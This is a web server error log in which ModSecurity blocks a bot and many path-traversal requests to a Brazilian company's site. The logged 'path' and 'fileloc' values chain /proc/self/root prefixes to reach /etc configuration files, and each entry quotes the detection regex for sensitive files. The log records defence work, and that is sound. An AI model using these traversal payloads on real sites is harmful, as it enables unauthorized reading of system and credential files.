[Mon Mar 16 13:32:02.697924 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.228.16:41478] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgwgqTCbgAP5jq5TeguOwAAAsQ"]
[Mon Mar 16 13:32:02.859451 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:37050] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwglajLEzk2WiQ-10WfQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:04.172240 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:37052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwhKQpVkWug9HeOt86DgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:05.701993 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:37060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwhbysWC90G-1nBrBIhQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:10.346622 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:37070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwirysWC90G-1nBrBIiwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:12.988308 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:33502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwjNSswJuvopo3lOhjqQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:14.306900 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:33504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwjrysWC90G-1nBrBIjAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:22.563248 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:36644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwlqQpVkWug9HeOt86FQAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Mon Mar 16 13:32:27.614221 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:33510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwm5qj1wV0Si-OkefzEQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:28.902289 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:54970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwnKQpVkWug9HeOt86FwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:30.042165 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:41388] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwntSswJuvopo3lOhjqwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:32.903477 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:41390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwoHjZBu2q05ozVU9cVwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:35.115388 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.243.203:41402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwolajLEzk2WiQ-10WgQAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:41.963285 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:41408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwqXjZBu2q05ozVU9cXQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:43.245359 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:44612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwq6TCbgAP5jq5TeguTQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:44.573441 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:44614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwrP9ocpUE4ed4uDzzxgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:45.796909 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.243.203:44626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwrVajLEzk2WiQ-10WggAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:47.141261 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:44632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwr46lpbStxTqkSktwbQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:48.354090 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:44638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwsNSswJuvopo3lOhjrAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:49.681034 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:44642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwsZqj1wV0Si-OkefzJwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:50.999095 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:58722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwsrABkC4fWIHEf8HweAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:52.215138 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:58736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwtLABkC4fWIHEf8HweQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:54.605241 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:58744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwttSswJuvopo3lOhjrwAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
